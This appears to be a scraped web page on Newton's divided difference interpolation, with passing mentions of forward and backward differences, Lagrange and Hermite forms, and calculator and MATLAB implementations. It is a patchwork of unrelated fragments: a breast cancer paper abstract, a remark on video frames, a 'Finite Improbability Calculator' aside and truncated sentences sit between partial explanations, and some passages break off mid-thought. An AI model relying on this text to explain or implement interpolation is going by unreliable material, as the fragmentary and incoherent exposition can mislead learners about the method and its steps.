2. Estimate μ, Σ, and rf.

Main steps:

1. Initialize the decision-making time t = 0, and let x(0) = [1, · · · , 1, 0, · · · , 0, 1].

2. Compute the stage cost matrix L of Eq. (43) and the Λ(k) of Eq. (59).

3. Observe the current state x(t), and set z = x(t).

4. Define LMI variables:

(a) Define the basic LMI variables, Pi, pi, and qi of Eq. (37).

(b) Define the derived LMI variables, Gi of Eq. (48) and Si of Eq. (57).

(c) Define the S-procedure multipliers of Eq. (58).

5. Find an approximate state value function by solving the associated LMI optimization problem.

6. Obtain the ADP control input, u(t), as the optimal solution v* of the associated quadratic program.

7. Proceed to the next time step, i.e., t ← (t + 1).

8. (optional) If necessary, update μ, Σ, and rf.

9. Go to step 2.

4. An Example

In this section, we illustrate the presented ADP-based procedure with an example of , which dealt with daily prices of five major stocks from November 11, 2004, to February 1, 2008.
The index I(t) in the example was defined based on IBM, 3M, Altria, Boeing, and AIG (the ticker symbols of which are IBM, MMM, MO, BA, and AIG, respectively). Their stock prices during the considered test period are shown in Figure 1.

As the subset comprising the tracking portfolio, the first three stocks, s1, s2, and s3 (i.e., IBM, MMM, and MO), were chosen. Note that n = 5 and m = 3 in this example. During the test period, the ADP-based tracking portfolio was updated every 30 trading days. In this update, the mean return vector μ and the covariance matrix Σ were estimated by averaging the past daily raw data via the exponentially weighted moving average (EWMA) method with decay factor λ = 0.999. For the risk-free rate, we assumed the same value as in . Between each 30-day update, the number of shares in the tracking portfolio remained the same. The ADP discount factor was chosen as γ = 0.99.",
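For reference, a generic EWMA recursion for the mean return vector and covariance can be sketched as follows; this is not the authors' code, but the decay factor `lam = 0.999` matches the value quoted above:

```python
import numpy as np

def ewma_update(mu, Sigma, r, lam=0.999):
    """Update EWMA estimates of the mean return vector and covariance
    with one new return observation r (1-D array)."""
    mu_new = lam * mu + (1.0 - lam) * r
    d = r - mu_new
    Sigma_new = lam * Sigma + (1.0 - lam) * np.outer(d, d)
    return mu_new, Sigma_new
```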
null,
"",
null,
"As described in Section 3, the performance index function was computed based on the mean-square distance between the index and the portfolio wealth. Finally, the allocation upper bound was considered for the first stock (i.e., J ={IBM}).",
null,
"",
null,
"",
null,
"",
null,
"We considered two scenarios with different constraints (Table 1). As shown in Table 1, trading has more severe constraints as the scenario number increases. In the first scenario, we traded with fundamental requirements (i.e., self-financing and a nonnegative portfolio) and the total allocation bound constraint (i.e., Constraint #3). For the upper bound constant for constraint #3, we used κ1 = 0:8. This bound means that the total investment in the three stocks (IBM, MMM, and MO) was required to be less than or equal to 80% of the total portfolio value. The control inputs obtained by the ADP procedure are shown in Figure 2. Applying these control inputs, we obtained the simulation results of Figures 3-5. Figure 3 shows that the ADP-based portfolio followed the index closely in Scenario #1. Figure 4 shows that the 80% upper bound condition for the total allocation in stocks was well respected by the ADP policy in Scenario #1. The specific portion of each stock in the tracking portfolio is shown in Figure 5.\n\nThis figure, together with Figure 2, shows that the control inputs changed the initial cash-only portfolio rapidly into the stock-dominating positions for successful tracking.\n\nIn the second scenario, more difficult constraints were imposed. More specifically, the κ1 value was reduced to 0:7, and the allocation in the first stock (i.e., IBM) was required not to exceed 20% of the total portfolio wealth. The control inputs and simulation results for Scenario #2 are shown in Figures 6-9.\n\nThese figures show that, although the tracking performance was a little degraded owing to the additional burden, the wealth of the ADP-based portfolio followed the trend of the index most of the time reasonably well with all the constraints being respected.",
null,
"",
null,
"",
null,
"",
null,
"5. Concluding Remarks\n\nThe constrained index tracking problem, in which the task of trading a set of stocks is performed so as to closely follow an index value under some constraints, can be viewed and formulated as an optimal decision-making problem in a highly uncertain and stochastic environment, and approaches based on stochastic optimal control methods are particularly pertinent. Since stochastic optimal control problems cannot be solved exactly except in very simple cases, in practice approximations are required to obtain good suboptimal policies. In this paper, we studied approximate dynamic programming applications for the constrained index tracking problem and presented an ADP-based index tracking procedure. Illustrative simulation results showed that the ADP-based tracking policy successfully produced an index-tracking portfolio under various constraints. Further work to be done includes more extensive comparative studies, which should reveal the strengths and weaknesses of the ADP-based index tracking, and applications to other types of related financial engineering problems.\n\n> Conflict of Interest\n\n• [Figure 1.] Normalized stock prices from November 11, 2004, to February 1, 2008.",
null,
"• [Table 1.] Simulation scenarios",
null,
"• [Figure 2.] Control inputs (Scenario #1).",
null,
"• [Figure 3.] Index vs. wealth of the tracking portfolio (Scenario #1).",
null,
"• [Figure 4.] Total percent allocation in stocks (Scenario #1).",
null,
"• [Figure 5.] Percent allocations in stocks and cash (Scenario #1).",
null,
"• [Figure 6.] Control inputs (Scenario #2).",
null,
"• [Figure 7.] Index vs. wealth of the tracking portfolio (Scenario #2).",
null,
"• [Figure 8.] Total percent allocation in stocks (Scenario #2).",
null,
"• [Figure 9.] Percent allocations in stocks (Scenario #2).",
null,
""
] | [
null,
"http://oak.go.kr/central/images/2015/cc_img.png",
null,
"http://oak.go.kr//repository/journal/12335/E1FLA5_2013_v13n1_19_f001.jpg",
null,
"http://oak.go.kr//repository/journal/12335/E1FLA5_2013_v13n1_19_t001.jpg",
null,
"http://oak.go.kr//repository/journal/12335/E1FLA5_2013_v13n1_19_f002.jpg",
null,
"http://oak.go.kr//repository/journal/12335/E1FLA5_2013_v13n1_19_f003.jpg",
null,
"http://oak.go.kr//repository/journal/12335/E1FLA5_2013_v13n1_19_f004.jpg",
null,
"http://oak.go.kr//repository/journal/12335/E1FLA5_2013_v13n1_19_f005.jpg",
null,
"http://oak.go.kr//repository/journal/12335/E1FLA5_2013_v13n1_19_f006.jpg",
null,
"http://oak.go.kr//repository/journal/12335/E1FLA5_2013_v13n1_19_f007.jpg",
null,
"http://oak.go.kr//repository/journal/12335/E1FLA5_2013_v13n1_19_f008.jpg",
null,
"http://oak.go.kr//repository/journal/12335/E1FLA5_2013_v13n1_19_f009.jpg",
null,
"http://oak.go.kr/repository/journal/12335/E1FLA5_2013_v13n1_19_f001.jpg",
null,
"http://oak.go.kr/repository/journal/12335/E1FLA5_2013_v13n1_19_t001.jpg",
null,
"http://oak.go.kr/repository/journal/12335/E1FLA5_2013_v13n1_19_f002.jpg",
null,
"http://oak.go.kr/repository/journal/12335/E1FLA5_2013_v13n1_19_f003.jpg",
null,
"http://oak.go.kr/repository/journal/12335/E1FLA5_2013_v13n1_19_f004.jpg",
null,
"http://oak.go.kr/repository/journal/12335/E1FLA5_2013_v13n1_19_f005.jpg",
null,
"http://oak.go.kr/repository/journal/12335/E1FLA5_2013_v13n1_19_f006.jpg",
null,
"http://oak.go.kr/repository/journal/12335/E1FLA5_2013_v13n1_19_f007.jpg",
null,
"http://oak.go.kr/repository/journal/12335/E1FLA5_2013_v13n1_19_f008.jpg",
null,
"http://oak.go.kr/repository/journal/12335/E1FLA5_2013_v13n1_19_f009.jpg",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.89159894,"math_prob":0.95733434,"size":22277,"snap":"2022-05-2022-21","text_gpt3_token_len":5065,"char_repetition_ratio":0.16576123,"word_repetition_ratio":0.074763834,"special_character_ratio":0.23248193,"punctuation_ratio":0.13364705,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9967268,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42],"im_url_duplicate_count":[null,null,null,4,null,4,null,4,null,4,null,4,null,4,null,4,null,4,null,4,null,4,null,4,null,4,null,4,null,4,null,4,null,4,null,4,null,4,null,4,null,4,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-01-24T06:19:37Z\",\"WARC-Record-ID\":\"<urn:uuid:8641ee65-f989-4c07-9b4f-fa6d007af802>\",\"Content-Length\":\"337462\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a65b4d20-8a31-4752-b56b-9d58efaaa222>\",\"WARC-Concurrent-To\":\"<urn:uuid:7de3bd48-a1b0-4801-8887-cc862916f553>\",\"WARC-IP-Address\":\"124.137.58.153\",\"WARC-Target-URI\":\"http://oak.go.kr/central/journallist/journaldetail.do?article_seq=12335\",\"WARC-Payload-Digest\":\"sha1:CEO52HP7UFGTDYSZUDK4GLFQBBQLUQWN\",\"WARC-Block-Digest\":\"sha1:T4WJ7KCBFC5PULGWPVWCG7QSTLLWCDK5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-05/CC-MAIN-2022-05_segments_1642320304515.74_warc_CC-MAIN-20220124054039-20220124084039-00363.warc.gz\"}"} |
https://www.sciences360.com/index.php/electric-voltage-and-current-11269/ | [
"",
null,
"Physics\n\n# Electric Voltage and Current",
null,
"Lime Red Tetrahedron's image for:\n\"Electric Voltage and Current\"\nCaption:\nLocation:\nImage by:",
null,
"Voltage and current: two fundamental principles of the physics of electricity. Since the fathers of electrical science discovered current electricity, man has sought ways to explain its properties. In this article, we will explore the concepts of electric current and electric potential (voltage), as well as draw analogies in order to facilitate understanding.\n\nFirst of all, let's define electric current. The electric current is the rate at which charge flows. Current is due to the flow of electrons through a conductor, thus current is proportional to the number of electrons that flow past a point on the wire in a given amount of time. However, quite counter-intuitively, the direction of current is defined to be opposite in direction to the direction of electron flow! This is due to a long-held hypothesis that electricity was the flow of positive charge from a positively-charged source to a negatively-charged sink. By the time that the electron - a negatively charged particle - was discovered as constituting electricity, much work had been done with the old assumptions. As positive and negative are just labels, it was decided that the convention of referring to a flow of positive charge would remain.\n\nA good way to visualize the electric current is with the water analogy. Picture water flowing through a pipe of fixed diameter. If you were to ask how much water was flowing through the pipe, the answer would be equivalent to the water current. Similarly, if you were to ask how many electrons were flowing through a wire, the answer would be related to the electric current.\n\nNow let's move on to voltage - a much more abstract concept. Voltage is also referred to as electric potential - it is the electric potential energy per unit charge. It is not, as some students erroneously believe, a form of energy. It is, however, related to energy. Current in a circuit flows because of difference of electric potential. For instance, a 9V battery has an electric potential difference (voltage) of 9V, with the negative terminal assigned a potential of 0V and the positive terminal assigned a potential of 9V. (Remember, electrical concepts are defined in terms of positive charge, although it is electrons that comprise electricity.) Current (the flow of positive charge) then flows from the side of the 9V battery with a high potential (the positive 9V terminal) to the side with the lower potential (the 0V negative terminal). It follows that electrons do exactly the opposite: that is, they travel from the 0V terminal to the 9V terminal. Note that voltage does not depend on how many electrons actually flow, as that would refer to current. Instead, the voltage is referring to how much energy each electron has, relative to the terminals of the power source. An easy way to remember that the amount of electron flow does not affect the voltage is to consider common household 1.5V batteries. These batteries come in a variety of sizes (AA, C, D), and yet all share the same voltage.\n\nA great way to visualize voltage is, once again, to think of the properties of flowing water. One such property is water pressure, which is analogous to voltage. Water pressure, for instance, would be greater if the source of water in a pipe system is located higher-up than the end of the pipe (which we will assume is capped). Likewise, as the top of the pipe is lowered to ground level, the water pressure would decrease. 
Note that the water pressure does not depend on how much water is in the pipe - we could achieve the very same pressure with less water and a narrower pipe."
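As a quick numerical check of the definitions above (current as charge per unit time, voltage as energy per unit charge), consider this made-up worked example:

```python
# Current: I = Q / t. If 3 coulombs of charge pass a point in 2 seconds:
Q, t = 3.0, 2.0
I = Q / t            # 1.5 amperes

# Voltage: V = E / Q. If a source gives each coulomb 9 joules of energy:
E, Q = 9.0, 1.0
V = E / Q            # 9 volts, like the 9V battery discussed above
```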
] | [
null,
"https://www.sciences360.com/wp-content/themes/helium/img/microsite-logos/360-degrees.png",
null,
"https://app.heliumnetwork.com/heliumnetwork",
null,
"https://www.sciences360.com/wp-content/themes/helium/img/loginBoxClose_buttonClose.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.9724065,"math_prob":0.973619,"size":3583,"snap":"2021-43-2021-49","text_gpt3_token_len":727,"char_repetition_ratio":0.152836,"word_repetition_ratio":0.00990099,"special_character_ratio":0.20011164,"punctuation_ratio":0.10147059,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9906422,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-12-02T03:56:07Z\",\"WARC-Record-ID\":\"<urn:uuid:0deb9726-e249-402a-8864-7f566a02a10a>\",\"Content-Length\":\"22377\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:73ddf1eb-e7c8-42f3-91a5-7bda8870e072>\",\"WARC-Concurrent-To\":\"<urn:uuid:325817d9-a6a8-46e4-8c4c-65a296641af8>\",\"WARC-IP-Address\":\"172.67.203.90\",\"WARC-Target-URI\":\"https://www.sciences360.com/index.php/electric-voltage-and-current-11269/\",\"WARC-Payload-Digest\":\"sha1:SB43MOX6HWL2OKF76QY7QZVDOK2VNTR4\",\"WARC-Block-Digest\":\"sha1:J5MXEWJ4E6TXSEHBWJFGOXFGTWBL2C2Z\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-49/CC-MAIN-2021-49_segments_1637964361064.69_warc_CC-MAIN-20211202024322-20211202054322-00043.warc.gz\"}"} |
http://paksebali.com/a73g/doppy | [
"# Newton Divided Difference Interpolation Calculator\n\nthe second kind, the di erence sequences, and the divided di erence sequences (or equivalently, the coe cients of Newton interpolation) of polynomials. The following MATLAB scripts were used to generate the gures. Central difference method. def calculate_newton_interpolation (divided_differences): Creates polynomial from given list of divided differences. What is great with Newton's interpolation is the fact that if you add new points you don't have to re-calculate all the coefficients (see forward divided difference formula) which can be really useful !. There is a relationship between the Lagrange polynomial and Newton polynomial, that is, it is possible to directly obtain the Lagrange polynomial from Newton's formula from the concept of divided difference. we can calculate the. To solve this problem using Newton polynomials, we build the following divided difference table. In Celik's paper on Richardson extrapolation, they use a \"third order Newton's Divided Difference Polynomial\" to interpolate the results between different grids. In this article we are going to develop an algorithm for Lagrange Interpolation. We can approximate this function using interpolation techniques such as Lagrange, Newton’s forward-difference, Newton’s backwarddifference, Newton’s central-difference or Newton’s divided-difference. The curve representing the behavior has to pass through every point (has to touch). Interpolation methods in Scipy oct 28, 2015 numerical-analysis interpolation python numpy scipy. Newton's forward difference formula is a finite difference identity giving an interpolated value between tabulated points {f_p} in terms of the first value f_0 and the powers of the forward difference Delta. Gregory-Newton backward difference approach is applicable when the data size is big and the divided difference table is too long. Next we look at Newton's formula for equal intervals, and we talk about divided differences. Hermite interpolation constructs an interpolant based not. We next discuss Hermite interpolation which helps us in nding an \\approximate value of the given function\" at a special point, from the. NEWTON'S BACKWARD DIFFERENCE INTERPOLATION; NEWTON'S FORWARD DIFFERENCE INTERPOLATION; Program to construct Newton's Divided Difference Interpolation Formula from the given distinct data points and estimate the value of the function; GENERAL NEWTON RAPHSON METHOD; Program to construct and display the Divided Difference Table from the given. The resulting Hermite interpolation is plotted together with in the figure below. LINEAR INTERPOLATION The simplest form of interpolation is probably the straight line, connecting two points by a straight line. It uses lesser number of computation than Lagrange method. This third degree polynomial function passes all three data points (the second derivative and the third derivative at and match that from the divided difference method). the divided difference table: We note that the third divided differences are constant. Interpolation Calculator. Hermite interpolation is a method of interpolating data points as a polynomial function, in the field of numerical analysis. We apply them for the data that we have got from the. While I give 45 x & 45 associated y values, it gives wrong resutlts but while I use 25 or less x & associated y values it works fine. In the subsequent tutorials we discuss the difference table. The function returns the coefficient vector of polinomial. 
There are many techniques for interpolation, and Newton's forward interpolation is one of the most widely used formulas. Charles Babbage's difference engine, an early mechanical calculator, was designed to use this algorithm in its operation, automatically tabulating polynomial functions. Here, f is a function that describes the relationship between z and (x, y). hermite_basis_1.m evaluates a zero-order Hermite interpolation basis function. For Newton's divided-difference interpolating polynomial, the simplest case is linear interpolation, where the interpolating polynomial is of first order. Note: as Newton's divided difference formula requires the divided difference table, it is better to rearrange the values of the argument before preparing the table. Given a sequence of (n+1) data points and a function f, the aim is to determine an n-th degree polynomial which interpolates f at these points; the method can be used to calculate the coefficients of the interpolation polynomial in the Newton form. Interpolation of angles: one may linearly interpolate angles in 2D, and may interpolate lines by interpolating angles and lengths instead of end points. f1(x) designates a first-order interpolating polynomial, and the method also handles unevenly spaced points. In spite of the different construction, the same interpolating polynomial as in the Lagrange method is generated.

In the Newton divided difference polynomial method, linear and quadratic interpolation are presented first to illustrate the idea. In the mathematical field of numerical analysis, a Newton polynomial, named after its inventor Isaac Newton, is the interpolation polynomial for a given set of data points expressed in the Newton form. A graphical demo uses Newton's divided differences to calculate Lagrange polynomials. The coefficients are given by the Newton divided differences, which you can calculate by building up from the given functional values. There are also Gauss's, Bessel's, Lagrange's and other interpolation formulas. The Neville-Aitken algorithm has the advantage that each number it generates is itself an interpolating polynomial (evaluated at the same point x) for some part of the data. In a C program implementing Newton's forward method of interpolation, you need to shift the indices. In Section 3, we shall use the table to interpolate by means of Newton's divided difference formula and determine the corresponding interpolating cubic. A typical exercise gives log 2 (= 0.3010) and log 3 (= 0.4771) and asks for an interpolated value, or asks to find a root of an equation; the worked solutions proceed by Newton's divided difference interpolation formula. Horner's rule provides a very efficient method of evaluating these polynomials, as sketched below.
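For example, the Newton form can be evaluated with a single Horner-style pass of nested multiplications; this sketch (hypothetical names) assumes a coefficient vector like the one produced by the routine above:

```python
def newton_eval(coef, x_nodes, t):
    """Evaluate the Newton-form polynomial with divided-difference
    coefficients coef and centers x_nodes at the point t,
    using nested (Horner-style) multiplication."""
    n = len(coef)
    p = coef[n - 1]
    for k in range(n - 2, -1, -1):
        p = p * (t - x_nodes[k]) + coef[k]
    return p

# Continuing the example above: coefficients [0, 3, 1] with nodes [1, 2, 4]
print(newton_eval([0, 3, 1], [1, 2, 4], 3.0))  # 8.0, since p(x) = x**2 - 1
```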
A related application appears in the International Journal of Advanced Research in IT and Engineering (ISSN: 2278-6244): "Application of Numerical Method Based on Interpolation for Detection of Breast Cancer" by Navid Samimi, Hedayat Bahadori, and Shabnam Azari, whose abstract notes that breast cancer is one of the leading causes of death among women all around the world. On the other hand, a bivariate approximation can be carried out in a spreadsheet. Note again that, since Newton's divided difference formula requires the divided difference table, it is better to rearrange the argument values before preparing the table. The Lagrange interpolation formula can be used to find a polynomial fit of degree n−1 (or less, if possible) through n data points. Many students ask how to do this or that in MATLAB, so let us look at Newton's divided difference method. One paper investigates the more general problem of Hermite interpolation. If all we know is function values, this is a reasonable approach. Although a result may be exact, it may carry only four significant figures. The equivalent interpolating formula can also be calculated from the divided differences that lie on the bottom diagonal of the table (the backward form). First, let us make the following important observations. The fixed-point question can be rephrased as finding a root of the difference of the two expressions (as the calculator did when it applied bisection), with Newton's method then used on this expression. Course syllabi (e.g., Veer Narmad South Gujarat University, Surat, B.Sc. Mathematics, Semesters III and IV, effective from June 2012) introduce the topic as: Interpolation - estimation of intermediate values between precise data points. One worked example (Example 5.8: Newton interpolation, divided differences) asks for the fourth-degree Newton interpolating polynomial for tabulated data and uses this polynomial to find the interpolated value at x = 0.7. In a video application, we did an interpolation between the first and third frames so we can compare the result with the second frame. In this blog, I show you how to do polynomial interpolation. A Newton-Horner method: if Horner's method makes it easy to compute the value and the derivative of a polynomial at any point x, then we are all set to use Newton's method — instead of writing two functions that evaluate the function and its derivative, we just pass in the coefficients of the polynomial, as in the sketch below.
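A hedged sketch of that Newton-Horner idea (the example polynomial x**3 - 2x - 5 is Newton's own historical test case; the function names and tolerances here are made up for illustration):

```python
def horner_with_derivative(a, x):
    """Evaluate p(x) and p'(x) by Horner's rule, where a = [a_n, ..., a_1, a_0]
    are the polynomial coefficients in descending powers of x."""
    p, dp = a[0], 0.0
    for c in a[1:]:
        dp = dp * x + p      # derivative runs one Horner pass behind the value
        p = p * x + c
    return p, dp

def newton_horner(a, x0, tol=1e-12, max_iter=50):
    """Newton's method for a polynomial root, using one Horner pass
    per iteration for both the value and the derivative."""
    x = x0
    for _ in range(max_iter):
        p, dp = horner_with_derivative(a, x)
        if dp == 0.0:
            break            # flat spot: stop rather than divide by zero
        step = p / dp
        x -= step
        if abs(step) < tol:
            break
    return x

# Root of p(x) = x**3 - 2x - 5, starting at x = 2:
print(newton_horner([1, 0, -2, -5], 2.0))  # ~2.0945514815423265
```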
Why should the Lagrange polynomial interpolation method be improved? One textbook exercise (P 4.1) asks for an interpolating polynomial of degree four using Newton's backward divided difference formula on given data; a key advantage of the Newton approach is that it is constructive. A TI-84 Plus and TI-83 Plus graphing calculator program performs interpolation calculations using Newton's divided differences method; its name is derived from the method of divided differences, a way to interpolate or tabulate functions by using a small set of polynomial coefficients. Encyclopedic treatments note that the following formula of Isaac Newton produces a polynomial function that fits the data:

f(x) = a0 + a1 (x − x0)/h + a2 (x − x0)(x − x1)/(2! h²) + · · ·

One of the properties of divided differences is the symmetry property, which states that divided differences remain unaffected by permutations (rearrangements) of their variables. Formula (1) is called Newton's interpolation formula for unequal differences. The Newton polynomial is sometimes called Newton's divided differences interpolation polynomial because the coefficients of the polynomial are calculated using Newton's divided differences. The interpolation calculator will return the function that best approximates the given points according to the chosen method. DIVDIF is a MATLAB library which creates, prints and manipulates divided difference polynomials. Similar to Lagrange's method for finding an interpolation polynomial, it finds the same interpolation polynomial, due to the uniqueness of interpolating polynomials. Newton's divided-difference interpolating polynomials: linear interpolation is the simplest form, connecting two data points with a straight line. Course notes cover Newton's divided differences, forward and backward differences, the "s choose k" notation, and the forward- and backward-difference ways of writing an interpolating polynomial; standard references include Süli and Mayers, An Introduction to Numerical Analysis, Cambridge Univ. Press, 2013, among general textbooks. Lagrange and other interpolation at equally spaced points, as in the example above, can yield a polynomial oscillating above and below the true function. Given here is the Gregory-Newton formula to calculate the Newton forward difference; make use of it to solve your polynomial equation, as in the sketch below.
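A small sketch of the Gregory-Newton forward difference evaluation for equally spaced nodes (assumed names and sample data; the binomial coefficient C(s, k) is updated incrementally rather than via factorials):

```python
def forward_differences(y):
    """Return [y_0, Δy_0, Δ²y_0, ...] for equally spaced data."""
    diffs = [y[0]]
    row = list(y)
    while len(row) > 1:
        row = [row[i + 1] - row[i] for i in range(len(row) - 1)]
        diffs.append(row[0])
    return diffs

def gregory_newton(x0, h, y, x):
    """Evaluate f(x) ≈ Σ_k C(s, k) Δ^k y_0, with s = (x − x0)/h."""
    s = (x - x0) / h
    total, term = 0.0, 1.0
    for k, d in enumerate(forward_differences(y)):
        if k > 0:
            term *= (s - (k - 1)) / k   # updates C(s, k) from C(s, k-1)
        total += term * d
    return total

# f(x) = x**2 sampled at 0, 1, 2, 3; interpolate at x = 1.5 -> 2.25
print(gregory_newton(0.0, 1.0, [0, 1, 4, 9], 1.5))
```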
In one paper, new Newton forward interpolation formulas are generated using 12, 13 and 14 points, which help to compute numerical integrals with much smaller error; the idea is to increase the number of coefficients. In a spreadsheet implementation, we add 1 to the value returned by MATCH to get the bracketing node x1. Seeing the recursion helps in understanding the process of finding divided differences, and the divided difference formulas are more versatile, useful in more kinds of problems. The generated Hermite interpolating polynomial is closely related to the Newton polynomial, in that both are derived from the calculation of divided differences. A MATLAB comment might read: % Use Newton's forward difference to interpolate % function f(x) at n+1 points. In the subsequent tutorials we discuss the difference table. How your calculator works: calculators are not really that smart — early models required you to first enter two numbers, press enter, and then choose the operation (add, subtract), and some demos simulate that kind of calculator. One collection of C programs, compiled in DEV C++, covers Gauss elimination, Lagrange interpolation, Newton divided differences, the Runge-Kutta method, the Taylor series method, the modified Euler method, Euler's method, Weddle's rule, the bisection method, Newton's backward interpolation, Newton's forward interpolation, and the Newton-Raphson method. Let us look at Newton's divided difference method (Observation 1): the Newton polynomial is sometimes called Newton's divided differences interpolation polynomial because its coefficients are calculated using Newton's divided differences method. Given a table of x and f(x) values, polynomial interpolation involves finding a polynomial of order n that passes through the n + 1 points; the Newton divided difference polynomial is given in nested form, and it may be noted that for calculating a higher-order polynomial we first start with the lower-order ones.
Other methods include the direct method and the Lagrangian interpolation method. We see that Newton interpolation produces an interpolating polynomial in the Newton form, with centers x0 = 1, x1 = 0, and x2 = 1. According to the definitions of divided differences, Newton's divided difference formula follows directly; in one calibration study, the cubic polynomial interpolant given by Newton's divided difference method obtained more accurate results than the calibration curve. First, we need a MATLAB function to compute the coefficients of the Newton divided difference interpolating polynomial. There are two disadvantages to using the Lagrangian interpolation polynomial: although the Lagrange and Newton forms are the same nth degree polynomial, merely expressed in terms of different basis polynomials weighted by different coefficients, the Lagrange form involves more arithmetic operations than the divided differences, and adding a point forces the coefficients to be recalculated. An exercise: write a C program to implement the Newton-Gregory forward interpolation. Course outlines list difference and finite element methods, numerical interpolation, Newton's iteration formula, divided differences, and Newton's computational scheme. Keywords: interpolation, difference table, Excel worksheet. Introduction: interpolation is the process of computing intermediate values of a function from the set of given or tabulated values of the function (author: Árpád Tóth, Eötvös University, Budapest, arpi@elte.hu). A classic calculator application concerns sin(x): first an interpolating polynomial p(x) for the interval [0, π/2] was constructed and its coefficients were stored in the computer. Suppose, likewise, that we are designing the ln key for a calculator whose display shows six digits to the right of the decimal point. Because we are especially interested in digital-computer applications, our approach to interpolation will not emphasize interpolation formulas based on difference techniques, since they are seldom used on computers. A better form of the interpolation polynomial for practical (or computational) purposes is the barycentric form of the Lagrange interpolation, or Newton polynomials: barycentric interpolation is a variant of Lagrange polynomial interpolation that is fast and stable, and it deserves to be known as the standard method of polynomial interpolation.
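A compact sketch of that barycentric form (the second, or "true", barycentric formula; names and test data are made up):

```python
def barycentric_weights(x):
    """Weights w_j = 1 / Π_{k≠j} (x_j − x_k) for the barycentric formula."""
    n = len(x)
    w = [1.0] * n
    for j in range(n):
        for k in range(n):
            if k != j:
                w[j] /= (x[j] - x[k])
    return w

def barycentric_eval(x, y, w, t):
    """p(t) = Σ_j w_j y_j/(t−x_j) / Σ_j w_j/(t−x_j)."""
    num = den = 0.0
    for xj, yj, wj in zip(x, y, w):
        if t == xj:
            return yj           # exactly at a node
        c = wj / (t - xj)
        num += c * yj
        den += c
    return num / den

x = [1.0, 2.0, 4.0]; y = [0.0, 3.0, 15.0]   # same data as before: p(x) = x**2 - 1
print(barycentric_eval(x, y, barycentric_weights(x), 3.0))  # 8.0
```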
A good interpolation polynomial needs to provide a relatively accurate approximation over an entire interval. Numerical methods course contents typically include: interpolation; difference tables; the Newton-Gregory forward interpolation formula; the Newton-Gregory backward interpolation formula; central differences; numerical differentiation; numerical solution of differential equations; Euler's method; and the improved Euler method (IEM). The Finite Improbability Calculator was first coded in spring of 2002, following publication of William Dembski's book, "No Free Lunch", and was ported to a PHP instantiation in January 2004, with routines added for calculating Specified Anti-Information. Given k+1 data points, the Newton form of the interpolating polynomial can be written down directly; the divided difference interpolation formula is the one used for unequally spaced tables.
Here, f is a function that describes the relationship between z and (x, y). ): forward and backward differences, \"s choose k\" notation, forward-differences and backward-differences ways of writing an interpolating polynomial (Sec. Exponential functions 4. If all we know is function values, this is a reasonable approach. What is great with Newton's interpolation is the fact that if you add new points you don't have to re-calculate all the coefficients (see forward divided difference formula) which can be really useful !. Although this result is exact, it has only four significant figures. The equivalent interpolating formula can also be calculated from the divided differences that lie on the bottom diagonal. F irst, let us make the following important observations. Create scripts with code, output, and formatted text in a single executable document. You also need to bring your York photo ID. The fixed point question can be rephrased as finding a root of the difference of the two expressions (as the calculator did when it applied bisection), and Newton's method used on this expression. VEER NARMAD SOUTH GUJARAT UNIVERSITY, SURAT SYLLABUS FOR B. Interpolation of Angles • Linear interpolation of angles, in 2D. Newton's Forward Interpolation in c program: Newton's Forward Interpolation is the process of finding the values of y=f(x) corresponding to any value of x between x0 to xn, for the given values of f(x) and the corresponding set of values of x. To do so, we need the interpolation methods, such as Lagrange Interpolation, Newton's Interpolation, and spline interpolation. In this paper we generate new Newton's Forward Interpolation Formula`s using 12 , 13 and 14 points , that help us to calculate any numerical integration with very much less amount of error`s , the idea is increase the coefficients instead of making. We'll add 1 to the value returned by MATCH to get 60 for x1 and 1. Seeing the recursion helps understand the process of finding divided differences. The divided difference formulas are more versatile, useful in more kinds of problems. The generated Hermite interpolating polynomial is closely related to the Newton polynomial, in that both are derived from the calculation of divided differences. % Use Newton's forward difference to interpolate % function f(x) at n+1 points. In the subsequent tutorials we discuss the difference table. How your calculator works Calculators are not really that smart. Many students ask me how do I do this or that in MATLAB. Compiled in DEV C++ You might be also interested in : Gauss Elimination Method Lagrange interpolation Newton Divided Difference Runge Kutta method method Taylor series method Modified Euler's method Euler's method Waddle's Rule method Bisection method Newton's Backward interpolation Newton's forward interpolation Newtons rapson. Let us look at Newton's Divided Difference Method. Observation 1. The Newton polynomial is sometimes called Newton's divided differences interpolation polynomial because the coefficients of the polynomial are calculated using Newton's divided differences method. Discover Live Editor. 3010) and log 3 ( = 0. x f(x) Polynomial Interpolation Spline. The Newton Divided Difference polynomial is given by: In this example it may be noted that for calculating the order polynomial, we first start with. Polynomial interpolation involves finding a polynomial of order n that passes through the n 1 points. 
Numerical analysis is the study of algorithms for the problems of continuous mathematics (as distinguished from discrete mathematics). Why approximate at all? Most functions cannot be evaluated exactly: sqrt(x), e^x, ln x, and the trigonometric functions, since using a computer we are limited to the elementary arithmetic operations +, -, ×, ÷, and with these operations we can only evaluate polynomials and rational functions (a polynomial divided by a polynomial). That is essentially how a calculator works; calculators are not really that smart, being at bottom a simulation of an add-and-subtract machine, so every other function key rests on a polynomial or rational approximation. A typical numerical-methods course covers this toolchain in order: interpolation, difference tables, the Newton-Gregory forward and backward interpolation formulas, central differences, numerical differentiation, and the numerical solution of differential equations with Euler's method and the improved Euler method (IEM). Within that toolchain, formulas built on central differences, such as Gauss's first and second interpolation formulas, have a simple anti-symmetric structure, and in general a difference of k-th order can be written as a linear combination of function values with coefficients derived by the recursive procedure described above; the divided difference method deserves to be known as the standard method of polynomial interpolation, and the divided differences have a number of special properties that can simplify work with them. To illustrate the general form, cubic interpolation through four points can be pictured; with suitable data the interpolant becomes, for example, 